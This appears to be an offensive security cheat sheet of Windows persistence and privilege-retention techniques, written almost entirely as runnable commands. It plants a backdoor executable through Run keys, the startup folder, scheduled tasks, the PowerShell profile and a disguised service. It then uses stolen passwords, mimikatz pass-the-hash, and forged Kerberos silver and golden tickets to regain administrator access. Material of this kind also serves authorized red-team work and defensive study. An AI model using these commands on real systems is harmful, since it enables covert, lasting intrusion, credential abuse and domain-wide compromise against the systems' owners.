# Userland techniques
# HKCU
# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available.)
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Start-up
# Create a batch script in the user startup folder.
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Scheduled Tasks
PS C:\>$A= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\>$T= New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\>$P= New-ScheduledTaskPrincipal "Rasta"
PS C:\>$S= New-ScheduledTaskSettingsSet
PS C:\>$D= New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
# PowerShell profiles
# You can backdoor the PowerShell profile.
PS C:\> Test-Path $profile
False
PS C:\> New-Item -Path $profile -Type File -Force
Directory: C:\Users\Rasta\Documents\WindowsPowerShell
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1
PS C:\>$string='Start-Process "cmd.exe"'
PS C:\>$string| Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques
# HKLM
# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
# Services
# Create a service that will start automatically or on demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
# Scheduled Tasks
PS C:\>$A= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\>$T= New-ScheduledTaskTrigger -Daily -At 9am
PS C:\>$P= New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\>$S= New-ScheduledTaskSettingsSet
PS C:\>$D= New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
# Maintaining Privilege
# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
# If you can't get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.
# Both domain accounts and local accounts can work.
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
# Adding new local users can be a method to get back into machines.
# The Administrators local group is one option, but the following groups can also be used:
Remote Desktop Users
Remote Management Users
Backup Operators
# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service. (In mimikatz this is the kerberos::golden module with /target and /service set, as below.)
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
# Golden tickets can be used to forge access to any service in the domain.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt